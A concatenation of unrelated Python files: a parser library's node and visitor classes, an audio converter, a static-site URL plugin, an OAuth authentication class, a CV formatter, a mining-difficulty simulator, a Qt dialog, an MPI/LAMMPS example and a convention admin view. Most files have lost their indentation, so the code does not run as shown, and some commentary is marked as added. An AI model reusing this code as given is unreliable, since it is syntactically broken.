self.end == other.end and
self.children == other.children)
def __ne__(self, other):
return not self == other
def __repr__(self, top_level=True):
"""Return a bit of code (though not an expression) that will recreate
me."""
# repr() of unicode flattens everything out to ASCII, so we don't need
# to explicitly encode things afterward.
ret = ["s = %r" % self.full_text] if top_level else []
ret.append("%s(%r, s, %s, %s%s)" % (
self.__class__.__name__,
self.expr_name,
self.start,
self.end,
(', children=[%s]' %
', '.join([c.__repr__(top_level=False) for c in self.children]))
if self.children else ''))
return '\n'.join(ret)
class RegexNode(Node):
"""Node returned from a ``Regex`` expression
Grants access to the ``re.Match`` object, in case you want to access
capturing groups, etc.
"""
__slots__ = ['match']
class RuleDecoratorMeta(type):
def __new__(metaclass, name, bases, namespace):
def unvisit(name):
"""Remove any leading "visit_" from a method name."""
return name[6:] if name.startswith('visit_') else name
methods = [v for k, v in iteritems(namespace) if
hasattr(v, '_rule') and isfunction(v)]
if methods:
from parsimonious.grammar import Grammar # circular import dodge
methods.sort(key=(lambda x: x.func_code.co_firstlineno)
if version_info[0] < 3 else
(lambda x: x.__code__.co_firstlineno))
# Possible enhancement: once we get the Grammar extensibility story
# solidified, we can have @rules *add* to the default grammar
# rather than pave over it.
namespace['grammar'] = Grammar(
'\n'.join('{name} = {expr}'.format(name=unvisit(m.__name__),
expr=m._rule)
for m in methods))
return super(RuleDecoratorMeta,
metaclass).__new__(metaclass, name, bases, namespace)
class NodeVisitor(with_metaclass(RuleDecoratorMeta,object)):
"""A shell for writing things that turn parse trees into something useful
Performs a depth-first traversal of an AST. Subclass this, add methods for
each expr you care about, instantiate, and call
``visit(top_node_of_parse_tree)``. It'll return the useful stuff. This API
is very similar to that of ``ast.NodeVisitor``.
These could easily all be static methods, but that would add at least as
much weirdness at the call site as the ``()`` for instantiation. And this
    way, we support subclasses that require state: options, for example,
or a symbol table constructed from a programming language's AST.
We never transform the parse tree in place, because...
* There are likely multiple references to the same ``Node`` object in a
parse tree, and changes to one reference would surprise you elsewhere.
* It makes it impossible to report errors: you'd end up with the "error"
arrow pointing someplace in a half-transformed mishmash of nodes--and
that's assuming you're even transforming the tree into another tree.
Heaven forbid you're making it into a string or something else.
"""
#: The :term:`default grammar`: the one recommended for use with this
#: visitor. If you populate this, you will be able to call
#: :meth:`NodeVisitor.parse()` as a shortcut.
grammar = None
#: Classes of exceptions you actually intend to raise during visitation
    #: and which should propagate out of the visitor. These will not be
#: wrapped in a VisitationError when they arise.
unwrapped_exceptions = ()
# TODO: If we need to optimize this, we can go back to putting subclasses
# in charge of visiting children; they know when not to bother. Or we can
# mark nodes as not descent-worthy in the grammar.
def visit(self, node):
"""Walk a parse tree, transforming it into another representation.
Recursively descend a parse tree, dispatching to the method named after
the rule in the :class:`~parsimonious.grammar.Grammar` that produced
each node. If, for example, a rule was... ::
bold = '<b>'
...the ``visit_bold()`` method would be called. It is your
responsibility to subclass :class:`NodeVisitor` and implement those
methods.
"""
method = getattr(self, 'visit_' + node.expr_name, self.generic_visit)
# Call that method, and show where in the tree it failed if it blows
# up.
try:
return method(node, [self.visit(n) for n in node])
except (VisitationError, UndefinedLabel):
# Don't catch and re-wrap already-wrapped exceptions.
raise
except self.unwrapped_exceptions:
raise
except Exception:
# Catch any exception, and tack on a parse tree so it's easier to
# see where it went wrong.
exc_class, exc, tb = exc_info()
reraise(VisitationError, VisitationError(exc, exc_class, node), tb)
def generic_visit(self, node, visited_children):
"""Default visitor method
:arg node: The node we're visiting
:arg visited_children: The results of visiting the children of that
node, in a list
I'm not sure there's an implementation of this that makes sense across
all (or even most) use cases, so we leave it to subclasses to implement
for now.
"""
raise NotImplementedError("No visitor method was defined for %s." %
node.expr_name)
# Convenience methods:
def parse(self, text, pos=0):
"""Parse some text with this Visitor's default grammar.
``SomeVisitor().parse('some_string')`` is a shortcut for
``SomeVisitor().visit(some_grammar.parse('some_string'))``.
"""
return self._parse_or_match(text, pos, 'parse')
def match(self, text, pos=0):
"""Parse some text with this Visitor's default grammar, but don't
insist on parsing all the way to the end.
``SomeVisitor().match('some_string')`` is a shortcut for
``SomeVisitor().visit(some_grammar.match('some_string'))``.
"""
return self._parse_or_match(text, pos, 'match')
# Internal convenience methods to help you write your own visitors:
def lift_child(self, node, _a):
"""Lift the sole child of ``node`` up to replace the node."""
(first_child,) = _a
return first_child
# Private methods:
def _parse_or_match(self, text, pos, method_name):
"""Execute a parse or match on the default grammar, followed by a
visitation.
Raise RuntimeError if there is no default grammar specified.
"""
if not self.grammar:
raise RuntimeError(
"The {cls}.{method}() shortcut won't work because {cls} was "
"never associated with a specific " "grammar. Fill out its "
"`grammar` attribute, and try again.".format(
cls=self.__class__.__name__,
method=method_name))
return self.visit(getattr(self.grammar, method_name)(text, pos=pos))
def rule(rule_string):
"""Decorate a NodeVisitor ``visit_*`` method to tie a grammar rule to it.
The following will arrange for the ``visit_digit`` method to receive the
results of the ``~"[0-9]"`` parse rule::
@rule('~"[0-9]"')
def visit_digit(self, node, visited_children):
...
Notice that there is no "digit = " as part of the rule; that gets inferred
from the method name.
In cases where there is only one kind of visitor interested in a grammar,
using ``@rule`` saves you having to look back and forth between the visitor
and the grammar definition.
On an implementation level, all ``@rule`` rules get stitched together into
    a :class:`~parsimonious.Grammar` that becomes the NodeVisitor's
:term:`default grammar`.
Typically, the choice of a default rule for this grammar is simple: whatever
``@rule`` comes first in the class is the default. But the choice may become
surprising if you divide the ``@rule`` calls among subclasses. At the
moment, which method "comes first" is decided simply by comparing line
numbers, so whatever method is on the smallest-numbered line will be the
default. In a future release, this will change to pick the
first ``@rule`` call on the basemost class that has one. That way, a
subclass which does not override the default rule's ``visit_*`` method
won't unintentionally change which rule is the default.
"""
def decorator(method):
method._rule = rule_string # XXX: Maybe register them on a class var instead so we can just override a @rule'd visitor method on a subclass without blowing away the rule string that comes with it.
return method
return decorator
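
# --- Illustrative usage sketch (added; not part of parsimonious itself) ---
# Nodes can be built and visited by hand, which shows how ``visit`` dispatches
# on ``expr_name`` and how ``text`` is just the ``full_text[start:end]`` slice.
# The ``word`` rule name and the visitor below are made up for this example.
if __name__ == '__main__':
    class _ShoutVisitor(NodeVisitor):
        def visit_word(self, node, visited_children):
            return node.text.upper()

        def generic_visit(self, node, visited_children):
            return visited_children or node.text

    _tree = Node('word', 'hi there', 0, 2)
    assert _tree.text == 'hi'
    assert _tree == Node('word', 'hi there', 0, 2)
    assert _ShoutVisitor().visit(_tree) == 'HI'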
|
#! /usr/bin/env python
import sys
import os
import argparse
from multiprocessing import cpu_count
import threading
from time import sleep
import re
import shutil
# depends on python-scandir-git <https://aur.archlinux.org/packages/python-scandir-git>
import scandir
from pythonscripts.tempfiles import TempFiles
from pythonscripts.subprocess_extensions import getstatusoutput
from pythonscripts.ffparser import FFprobeParser
audio_types = ("mp3", "aac", "ac3", "mp2", "wma", "wav", "mka", "m4a", "ogg", "oga", "flac")
audio_file_regex = re.compile("^(?P<dirname>/(.*/)*)(?P<filename>.*(?P<extension>\.(" + "|".join(audio_types) + ")))$")
ffmpeg_command = "/usr/bin/ffmpeg -i %(input)s -acodec libmp3lame -ar 44100 -ab %(bitrate)dk -ac 2 -f mp3 -map_metadata 0 -y %(output)s"
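# Illustrative note (added): with the default bitrate of 128 kb/s the template
# above expands to roughly
#   /usr/bin/ffmpeg -i INPUT -acodec libmp3lame -ar 44100 -ab 128k -ac 2 \
#       -f mp3 -map_metadata 0 -y OUTPUT
# i.e. a stereo 44.1 kHz MP3 encode that carries over the global metadata and
# overwrites OUTPUT if it already exists.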
class GettingBitrateError(Exception):
def __init__(self, fname):
self.message = "Couldn't get bitrate from file " + fname
class ConversionError(Exception):
def __init__(self, fname, status, output):
self.message = "Error while converting file " + fname + "\nffmpeg exited with status " + str(status) + "\n" + output
def get_bitrate(filename):
parser = FFprobeParser(filename)
bitrate = parser.get("audio", "bit_rate")
del parser
if bitrate is None:
raise GettingBitrateError(filename)
else:
return bitrate // 1000
def convert(filename, output_extension, bitrate, delete_after=False):
tmpfile = tmp.getTempFileName()
command = ffmpeg_command % {"input": re.escape(filename), "bitrate": bitrate, "output": re.escape(tmpfile)}
status, output = getstatusoutput(command)
if status > 0:
tmp.remove(tmpfile)
raise ConversionError(filename, status, output)
else:
if delete_after:
os.remove(filename)
shutil.move(tmpfile, os.path.splitext(filename)[0] + output_extension)
tmp.remove(tmpfile)
# thread-safe iterating over generators
class LockedIterator(object):
def __init__(self, it):
self.lock = threading.Lock()
self.it = it.__iter__()
def __iter__(self):
return self
def __next__(self):
self.lock.acquire()
try:
return next(self.it)
finally:
self.lock.release()
class Main():
def __init__(self, args):
self.countAudioFiles = 0
self.countHigherBitrate = 0
self.countDifferentFormat = 0
self.countErrors = 0
self.countNonAudioFiles = 0
self.dry_run = args.dry_run
self.bitrate = args.bitrate
self.verbose = args.verbose
self.recursive = args.recursive
self.deleteAfter = args.delete_after
self.outputExtension = "." + args.output_extension
self.paths = args.path
try:
self.threads = cpu_count()
except NotImplementedError:
print("Unable to determine number of CPU cores, assuming one.")
self.threads = 1
self.killed = threading.Event()
self.threadsFinished = 0
self.queue = LockedIterator(self.queue_generator())
def print_stats(self):
print()
print("-----------collected statistics-----------")
print("All audio files (without errors): % 6d" % self.countAudioFiles)
print("Converted files: % 6d" % (self.countDifferentFormat + self.countHigherBitrate))
print(" - different format: % 6d" % self.countDifferentFormat)
print(" - %3s but higher bitrate: % 6d" % (self.outputExtension[1:], self.countHigherBitrate))
print("Errors: % 6d" % self.countErrors)
print("Non-audio files: % 6d" % self.countNonAudioFiles)
print("------------------------------------------")
def check(self, path):
match = re.match(audio_file_regex, path)
if not match:
self.countNonAudioFiles += 1
return False
filename = match.group("filename")
ext = match.group("extension")
self.countAudioFiles += 1
if ext != self.outputExtension:
self.countDifferentFormat += 1
return True
bitrate = get_bitrate(path)
if self.verbose > 0:
sys.stdout.write("% 3s kb/s: %s\n" % (bitrate, filename))
if bitrate > self.bitrate:
self.countHigherBitrate += 1
return True
return False
def run(self):
for i in range(self.threads):
t = threading.Thread(target=self.worker, args=(i + 1,))
t.start()
try:
while self.threadsFinished < self.threads:
sleep(0.5)
except (KeyboardInterrupt, SystemExit):
self.killed.set()
self.print_stats()
def worker(self, id):
try:
while not self.killed.is_set():
i = next(self.queue)
i = os.path.abspath(i)
try:
# check bitrate/filetype etc., skip if conversion not necessary
if not self.check(i) or self.dry_run:
continue
convert(i, self.outputExtension, self.bitrate, self.deleteAfter)
except ConversionError as e:
msg = "ERROR: failed to convert file '%s'\n" % i
if self.verbose > 0:
msg += e.message + "\n"
sys.stdout.write(msg)
self.countErrors += 1
except GettingBitrateError as e:
msg = "ERROR: failed to get bitrate from file '%s'" % i
if self.verbose > 0:
msg += e.message + "\n"
sys.stdout.write(msg)
self.countErrors += 1
else:
sys.stdout.write("Thread % 2d: %s\n" % (id, i))
except StopIteration:
pass
finally:
self.threadsFinished += 1
def queue_generator(self):
""" For each directory in self.files returns generator returning full paths to mp3 files in that folder.
If self.files contains file paths instead of directory, it's returned as [file].
"""
def walk(root):
dirs = []
files = []
for entry in scandir.scandir(root):
if entry.is_dir():
dirs.append(entry.name)
elif entry.is_file():
files.append(entry.name)
# first yield found files, then recurse into subdirs
for f in files:
yield os.path.join(root, f)
if self.recursive:
for d in dirs: # recurse into subdir
for f in walk(os.path.join(root, d)):
yield f
for path in self.paths:
if os.path.isdir(path):
for f in walk(path):
yield f
else:
yield path
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="convert all audio files in given folder (recursively) to specified bitrate, skip if bitrate is less or equal")
parser.add_argument("path", action="store", nargs="+", help="path to file(s) to convert - filename or directory")
parser.add_argument("-r", "--recursive", action="store_true", help="browse folders recursively")
parser.add_argument("--dry-run", action="store_true", help="don't convert, only print stats")
parser.add_argument("-b", "--bitrate", action="store", type=int, metavar="BITRATE", default="128", help="set bitrate - in kb/s, default=128")
parser.add_argument("-v", "--verbose", action="count", default=0, help="set verbosity level")
parser.add_argument("--delete-after", action="store_true", help="delete old files after conversion")
parser.add_argument("--output-extension", choices=audio_types, type=str, default="mp3", help="set output extension")
args = parser.parse_args()
tmp = TempFiles()
main = Main(args)
main.run()
|
# -*- coding: utf-8 -*-
"""
Contains classes and utilities related to hyde urls.
"""
from hyde.plugin import Plugin
from hyde.site import Site
from functools import wraps
from fswrap import File
class UrlCleanerPlugin(Plugin):
"""
Url Cleaner plugin for hyde. Adds to hyde the ability to generate clean
urls.
Configuration example
---------------------
#yaml
urlcleaner:
index_file_names:
# Identifies the files that represents a directory listing.
# These file names are automatically stripped away when
# the content_url function is called.
- index.html
strip_extensions:
# The following extensions are automatically removed when
# generating the urls using content_url function.
- html
# This option will append a slash to the end of directory paths
append_slash: true
"""
def __init__(self, site):
super(UrlCleanerPlugin, self).__init__(site)
def begin_site(self):
"""
Replace the content_url method in the site object with a custom method
that cleans urls based on the given configuration.
"""
config = self.site.config
if not hasattr(config, 'urlcleaner'):
return
if (hasattr(Site, '___url_cleaner_patched___')):
return
settings = config.urlcleaner
def clean_url(urlgetter):
@wraps(urlgetter)
def wrapper(site, path, safe=None):
url = urlgetter(site, path, safe)
index_file_names = getattr(settings,
'index_file_names',
['index.html'])
rep = File(url)
if rep.name in index_file_names:
url = rep.parent.path.rstrip('/')
if hasattr(settings, 'append_slash') and \
settings.append_slash:
url += '/'
elif hasattr(settings, 'strip_extensions'):
if rep.kind in settings.strip_extensions:
url = rep.parent.child(rep.name_without_extension)
return url or '/'
return wrapper
Site.___url_cleaner_patched___ = True
Site.content_url = clean_url(Site.content_url)
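# Illustrative note (added; the paths below are hypothetical): with the sample
# configuration from the class docstring, the patched Site.content_url would
# map, roughly:
#   blog/index.html  ->  blog/    (index file stripped, slash appended)
#   about.html       ->  about    (listed extension stripped)
#   media/logo.png   ->  media/logo.png  (left untouched)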
|
from functools import partial
import commonware.log
import jingo
from piston.authentication.oauth import OAuthAuthentication, views
from django.contrib.auth.models import AnonymousUser
from access.middleware import ACLMiddleware
from users.models import UserProfile
from zadmin import jinja_for_django
# This allows the views in piston.authentication.oauth to cope with
# Jinja2 templates as opposed to Django templates.
# Piston view passes: template, context, request_context
jfd = lambda a, b, c: jinja_for_django(a, b, context_instance=c)
views.render_to_response = jfd
log = commonware.log.getLogger('z.api')
class AMOOAuthAuthentication(OAuthAuthentication):
"""^^^MOO!!! Adds amo_user to the request object."""
def is_authenticated(self, request):
if request.user and request.user.is_authenticated():
return True
# To avoid patching django-piston, use a partial to cope with
# piston not sending in request when called later.
self.challenge = partial(self._challenge, request=request)
# Authenticate the user using Piston, rv will be True or False
# depending upon how it went.
rv = super(AMOOAuthAuthentication, self).is_authenticated(request)
if rv and request.user:
# The user is there, but we need to alter the user to be
# a user specified in the request. Specifically chose this
# term to avoid conflict with user, which could be used elsewhere.
if self.two_legged and 'authenticate_as' in request.REQUEST:
pk = request.REQUEST.get('authenticate_as')
try:
profile = UserProfile.objects.get(pk=pk)
except UserProfile.DoesNotExist:
log.warning('Cannot find user: %s' % pk)
return False
if profile.deleted or profile.confirmationcode:
log.warning('Tried to use deleted or unconfirmed user: %s'
% pk)
return False
log.info('Authenticating as: %s' % pk)
request.user = profile.user
# If that worked and request.user got set, setup AMO specific bits.
ACLMiddleware().process_request(request)
else:
# The piston middleware could find a consumer, but no
# user on that consumer. If it does it returns True, but
# request.user is None, which then blows up other things.
request.user = AnonymousUser()
return False
return rv
def _challenge(self, request):
response = jingo.render(request, 'piston/oauth/challenge.html',
status=401)
response['WWW-Authenticate'] = 'OAuth realm="API"'
return response
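# Illustrative note (added; the URL below is hypothetical): in the two-legged
# case a consumer that wants to act on behalf of a user passes the user's pk,
# e.g. ...?authenticate_as=1234. is_authenticated() above then swaps
# request.user to that profile's user, after rejecting deleted or unconfirmed
# profiles.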
|
# -*- coding: utf-8 -*-
# This file is part of Invenio.
# Copyright (C) 2008, 2010, 2011 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
Search engine CVifier, generating CVs for record collections in LaTeX, html, and plaintext formats.
The main API is cvify_records().
"""
__lastupdated__ = """$Date$"""
__revision__ = "$Id$"
from invenio.bibformat import format_records
from invenio.config import CFG_SITE_SUPPORT_EMAIL
import invenio.template
websearch_templates = invenio.template.load('websearch')
def cvify_records(recids, of, req=None, so='d'):
"""
    Write a CV for the records RECIDS in the format OF.
    REQ is the Apache/mod_python request object.
    SO is the sort order: 'd' lists the records in reverse order.
"""
# intbitsets don't support indexing, so we need a list from our hitset first
recids = [hit for hit in recids]
if so == 'd':
recids.reverse()
if of.startswith('h'):
if of == 'hcv':
format_records(recids, of=of,
record_prefix=lambda count: '%d) ' % (count+1),
req=req)
elif of == 'htcv':
format_records(recids, of=of,
record_prefix=lambda count: '%d) ' % (count+1),
req=req)
elif of == 'tlcv':
HEADER = r'''
\documentclass{article}
%%To use pdflatex, uncomment these lines, as well as the \href lines
%%in each entry
%%\usepackage[pdftex,
%% colorlinks=true,
%% urlcolor=blue, %% \href{...}{...} external (URL)
%% filecolor=green, %% \href{...} local file
%% linkcolor=red, %% \ref{...} and \pageref{...}
%% pdftitle={Papers by AUTHOR},
%% pdfauthor={Your Name},
%% pdfsubject={Just a test},
%% pdfkeywords={test testing testable},
%% pagebackref,
%% pdfpagemode=None,
%% bookmarksopen=true]{hyperref}
%%usepackage{arial}
%%\renewcommand{\familydefault}{\sfdefault} %% San serif
\renewcommand{\labelenumii}{\arabic{enumi}.\arabic{enumii}}
\pagestyle{empty}
\oddsidemargin 0.0in
\textwidth 6.5in
\topmargin -0.75in
\textheight 9.5in
\begin{document}
\title{Papers by AUTHOR}
\author{}
\date{}
\maketitle
\begin{enumerate}
%%%% LIST OF PAPERS
%%%% Please comment out anything between here and the
%%%% first \item
%%%% Please send any updates or corrections to the list to
%%%% %(email)s
''' % { 'email' : CFG_SITE_SUPPORT_EMAIL, }
FOOTER = r'''
\end{enumerate}
\end{document}
'''
format_records(recids, of=of,
prologue=HEADER,
epilogue=FOOTER,
req=req)
return ''
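# Illustrative usage sketch (added; the record IDs are made up):
#   cvify_records([12, 34, 56], of='tlcv', req=req, so='d')
# formats the records in reverse order as a LaTeX document, wrapping them in
# the HEADER preamble and FOOTER defined above.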
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
FILTER_COEFF = [
-845859, -459003, -573589, -703227, -848199, -1008841,
-1183669, -1372046, -1573247, -1787578, -2011503, -2243311,
-2482346, -2723079, -2964681, -3202200, -3432186, -3650186,
-3851924, -4032122, -4185340, -4306430, -4389146, -4427786,
-4416716, -4349289, -4220031, -4022692, -3751740, -3401468,
-2966915, -2443070, -1825548, -1110759, -295281, 623307,
1646668, 2775970, 4011152, 5351560, 6795424, 8340274,
9982332, 11717130, 13539111, 15441640, 17417389, 19457954,
21554056, 23695744, 25872220, 28072119, 30283431, 32493814,
34690317, 36859911, 38989360, 41065293, 43074548, 45004087,
46841170, 48573558, 50189545, 51678076, 53028839, 54232505,
55280554, 56165609, 56881415, 57422788, 57785876, 57968085,
57968084, 57785876, 57422788, 56881415, 56165609, 55280554,
54232505, 53028839, 51678076, 50189545, 48573558, 46841170,
45004087, 43074548, 41065293, 38989360, 36859911, 34690317,
32493814, 30283431, 28072119, 25872220, 23695744, 21554057,
19457953, 17417389, 15441640, 13539111, 11717130, 9982332,
8340274, 6795424, 5351560, 4011152, 2775970, 1646668,
623307, -295281, -1110759, -1825548, -2443070, -2966915,
-3401468, -3751740, -4022692, -4220031, -4349289, -4416715,
-4427787, -4389146, -4306430, -4185340, -4032122, -3851924,
-3650186, -3432186, -3202200, -2964681, -2723079, -2482346,
-2243311, -2011503, -1787578, -1573247, -1372046, -1183669,
-1008841, -848199, -703227, -573589, -459003, -845858]
from itertools import izip
def next_difficulty(history, gain, limiter):
if len(history)<2:
return 1.0
vTimeDelta = [x[0] for x in history[:145]]
vTimeDelta = [y-x for x,y in izip(vTimeDelta[:-1], vTimeDelta[1:])]
vTimeDelta.extend([600] * (144 - len(vTimeDelta)))
vTimeDelta = [x*y for x,y in izip(vTimeDelta, FILTER_COEFF)]
# TODO: remove FPU arithmetic and replace with bignums
    dFilteredInterval = -sum(vTimeDelta) / 2147483648.0
    dAdjustmentFactor = 1.0 - gain * (dFilteredInterval - 600.0) / 600.0
#print (dFilteredInterval, dAdjustmentFactor)
max_limiter = limiter
min_limiter = 1.0 / limiter
if dAdjustmentFactor > max_limiter:
dAdjustmentFactor = max_limiter
elif dAdjustmentFactor < min_limiter:
dAdjustmentFactor = min_limiter
return history[0][1] * dAdjustmentFactor
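# Illustrative worked example (added): if the filtered inter-block interval
# comes out at 900 seconds with gain=0.18, then
#   dAdjustmentFactor = 1.0 - 0.18 * (900.0 - 600.0) / 600.0 = 0.91
# so blocks are arriving too slowly and the next difficulty is cut to 91% of
# the previous one, subject to the limiter clamp in next_difficulty().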
from random import expovariate
def simulate(start, end, nethash, interval=72, gain=0.18, limiter=2.0):
blocks = []
time = start
while time < end:
if not len(blocks)%interval:
nd = next_difficulty(blocks[:-146:-1], gain, limiter)
blocks.append( (round(time), nd) )
nh = nethash(time)
time += expovariate(1.0 / (600.0 * nd / nh))
#print (nd, nh, time)
return blocks
from bisect import bisect_left
def smooth(history, window=16):
# Sort the history by time, so that we don't have any negative block
# times. Not ideal, but allows us to avoid possible instability in the
# simulator.
history = [(int(n),int(t),float(d))
for t,n,d in sorted((t,n,d) for n,t,d in history)]
diff = []
for idx in xrange(2, len(history)-1):
offset = min(idx-1, window, len(history)-1-idx)
interval = (history[idx + offset][1] -
history[idx - offset][1]) / (2.0 * offset + 1)
diff.append((history[idx][1], history[idx][2]*600.0/interval))
def nethash(time):
if time > diff[-1][0]:
return diff[-1][1]
return diff[bisect_left(diff, (time, 1.0))][1]
return nethash
from csv import reader
def history_from_csv(filename):
with open(filename, 'r') as csvfile:
return [(int(n),int(t),float(d)) for n,t,d in reader(csvfile)]
def utility_function(blocks):
# Calculate root-mean-square difference from a straight-line
# approximation
l = len(blocks)
b = sum(t for t,d in blocks)/l - 300.0*l
e = sum((600.0*n+b - t)**2 for n,(t,d) in enumerate(blocks))/l
return e**0.5
def xfrange(x, y, step):
while x < y:
yield x
x += step
if __name__ == '__main__':
frc = history_from_csv('frc.csv')
print(u"VertiCoin historical error: %f" % utility_function([(t,d) for n,t,d in frc]))
btc = history_from_csv('btc.csv')
print(u"Bitcoin historical error: %f" % utility_function([(t,d) for n,t,d in btc]))
smoothed = smooth(btc)
print(u"w=12,G=0.15")
fp = open('out.csv', 'w')
for l in xfrange(1.0175, 1.25, 0.0025):
#for I in xrange(1, 73):
blks = simulate(btc[0][1], btc[-1][1], smoothed, interval=12, gain=0.15, limiter=l)
quality = (l, utility_function(blks))
print(u"l=%f: %f" % quality)
fp.write("%f,%f\n" % quality)
fp.close()
#
# End of File
#
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
from qframer.qt.QtCore import *
from qframer.qt.QtGui import *
def set_skin(widget, qssfile):
if os.path.exists(qssfile):
fd = open(qssfile, "r")
style = fd.read()
fd.close()
widget.setStyleSheet(style)
class BaseDialog(QDialog):
def __init__(self, styleoptions, parent=None):
super(BaseDialog, self).__init__(parent)
title = styleoptions['title']
windowicon = styleoptions['windowicon']
minsize = styleoptions['minsize']
size = styleoptions['size']
logo_title = styleoptions['logo_title']
logo_img_url = styleoptions['logo_img_url']
self.setWindowTitle(title)
        self.setWindowIcon(QIcon(windowicon))  # set the window icon
self.setMinimumSize(minsize[0], minsize[1])
self.setWindowFlags(Qt.FramelessWindowHint | Qt.WindowSystemMenuHint |
                            Qt.WindowMinimizeButtonHint)  # frameless, with system menu, minimizable
self.logowidget = DynamicTextWidget(logo_title, logo_img_url)
        # main layout
mainlayout = QVBoxLayout()
mainlayout.addWidget(self.logowidget)
mainlayout.setContentsMargins(5, 5, 5, 5)
mainlayout.setSpacing(0)
self.setLayout(mainlayout)
self.resize(size[0], size[1])
def mousePressEvent(self, event):
        # mouse press event
if event.button() == Qt.LeftButton:
self.dragPosition = event.globalPos() - self.frameGeometry().topLeft()
event.accept()
def mouseReleaseEvent(self, event):
        # mouse release event
if hasattr(self, "dragPosition"):
del self.dragPosition
def mouseMoveEvent(self, event):
        # mouse move event
if hasattr(self, "dragPosition"):
if event.buttons() == Qt.LeftButton:
self.move(event.globalPos() - self.dragPosition)
event.accept()
class DynamicTextWidget(QWidget):
def __init__(self, text, bg, parent=None):
super(DynamicTextWidget, self).__init__(parent)
self.setFixedSize(400, 132)
self.bg = bg
self.text = text
newFont = self.font()
newFont.setPointSize(newFont.pointSize() + 10)
self.setFont(newFont)
self.painter = QPainter()
self.timer = QBasicTimer()
self.step = 0
self.timer.start(60, self)
def paintEvent(self, event):
self.painter.begin(self)
self.drawBackground(self.painter)
self.drawDynamicText(self.painter)
self.painter.end()
def set_painterpencolor(self, painter):
color = QColor()
import random
i = random.randint(1, 15)
color.setHsv((15 - i) * 16, 255, 191)
painter.setPen(color)
def drawBackground(self, painter):
painter.drawPixmap(0, 0, self.width(), self.height(), QPixmap(self.bg))
def drawDynamicText(self, painter):
sineTable = (0, 38, 71, 92, 100, 92, 71, 38, 0, -38, -71, -92, -100, -
92, -71, -38)
metrics = QFontMetrics(self.font())
x = (self.width() - metrics.width(self.text)) / 2
y = (self.height() + metrics.ascent() - metrics.descent()) / 2
color = QColor()
for i, ch in enumerate(self.text):
index = (self.step + i) % 16
color.setHsv((15 - index) * 16, 255, 191)
painter.setPen(color)
painter.drawText(x, y -
((sineTable[index] * metrics.height()) / 400), ch)
x += metrics.width(ch)
def setText(self, newText):
self.text = newText
def setspreed(self, spreed):
self.spreed = spreed
self.timer.stop()
self.timer.start(self.spreed, self)
def timerEvent(self, event):
if self.text:
if event.timerId() == self.timer.timerId():
self.step += 1
self.update()
else:
super(DynamicTextWidget, self).timerEvent(event)
else:
self.timer.stop()
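# Illustrative note (added): drawDynamicText() offsets character i vertically
# by sineTable[(step + i) % 16] * fontHeight / 400 pixels, so the text ripples
# through one full sine period every 16 timer ticks (roughly once a second at
# the default 60 ms interval).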
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
styleoptions = {
'title': u'退出设置',
'windowicon': "../skin/images/ov-orange-green.png",
'minsize': (400, 300),
'size': (400, 300),
'logo_title': u'dssssssss',
'logo_img_url': "../skin/images/ov-orange-green.png"
}
dialog = BaseDialog(styleoptions)
dialog.show()
sys.exit(app.exec_())
|
#!/usr/bin/env python -i
# preceding line should have path for Python on your machine
# split.py
# Purpose: similar to simple.py, but first the world communicator
# is split in two halves and LAMMPS is run only on one partition
# Syntax: split.py in.lammps
# in.lammps = LAMMPS input script
from __future__ import print_function
import sys
# parse command line
argv = sys.argv
if len(argv) != 2:
  print("Syntax: split.py in.lammps")
  sys.exit()
infile = sys.argv[1]
me = 0
# this example *only* works with mpi4py version 2.0.0 or later
from mpi4py import MPI
comm = MPI.COMM_WORLD
me = comm.Get_rank()
nprocs = comm.Get_size()
# create two subcommunicators
if me < nprocs // 2: color = 0
else: color = 1
split = comm.Split(color,key=0)
if color == 0:
from lammps import lammps
lmp = lammps(comm=split)
# run infile one line at a time
lines = open(infile,'r').readlines()
for line in lines: lmp.command(line)
# run 10 more steps
# get coords from LAMMPS
# change coords of 1st atom
# put coords back into LAMMPS
# run a single step with changed coords
lmp.command("run 10")
x = lmp.gather_atoms("x",1,3)
epsilon = 0.1
x[0] += epsilon
lmp.scatter_atoms("x",1,3,x)
lmp.command("run 1");
f = lmp.extract_atom("f")
print("Force on 1 atom via extract_atom: ",f[0][0])
fx = lmp.extract_variable("fx","all",1)
print("Force on 1 atom via extract_variable:",fx[0])
print("Proc %d out of %d procs has" % (me,nprocs), lmp)
print("Calculation on partition 0 complete")
else:
# could run a 2nd calculation on second partition
# with different LAMMPS instance or another code
# in this case, just sleep on second partition
import time
time.sleep(2)
print("Calculation on partition 1 complete")
# shutdown mpi4py
comm.Barrier()
MPI.Finalize()
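# Illustrative usage note (added; the exact mpirun invocation may differ):
#   mpirun -np 4 python split.py in.lammps
# puts ranks 0-1 into the LAMMPS partition (color 0) and leaves ranks 2-3
# sleeping in the dummy partition (color 1).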
|
from uber.common import *
@all_renderable(c.PEOPLE, c.REG_AT_CON)
class Root:
def index(self, session, message='', order='name', show='all'):
which = {
'all': [],
'tables': [Group.tables > 0],
'groups': [Group.tables == 0]
}[show]
# TODO: think about using a SQLAlchemy column property for .badges and then just use .order()
groups = sorted(session.query(Group).filter(*which).options(joinedload('attendees')).all(),
reverse=order.startswith('-'),
key=lambda g: [getattr(g, order.lstrip('-')), g.tables])
return {
'show': show,
'groups': groups,
'message': message,
'order': Order(order),
'total_groups': len(groups),
'total_badges': sum(g.badges for g in groups),
'tabled_badges': sum(g.badges for g in groups if g.tables),
'untabled_badges': sum(g.badges for g in groups if not g.tables),
'tabled_groups': len([g for g in groups if g.tables]),
'untabled_groups': len([g for g in groups if not g.tables]),
'tables': sum(g.tables for g in groups),
'unapproved_tables': sum(g.tables for g in groups if g.status == c.UNAPPROVED),
'waitlisted_tables': sum(g.tables for g in groups if g.status == c.WAITLISTED),
'approved_tables': sum(g.tables for g in groups if g.status == c.APPROVED)
}
@log_pageview
def form(self, session, new_dealer='', first_name='', last_name='', email='', message='', **params):
group = session.group(params, bools=['auto_recalc', 'can_add'])
if 'name' in params:
message = check(group)
if not message:
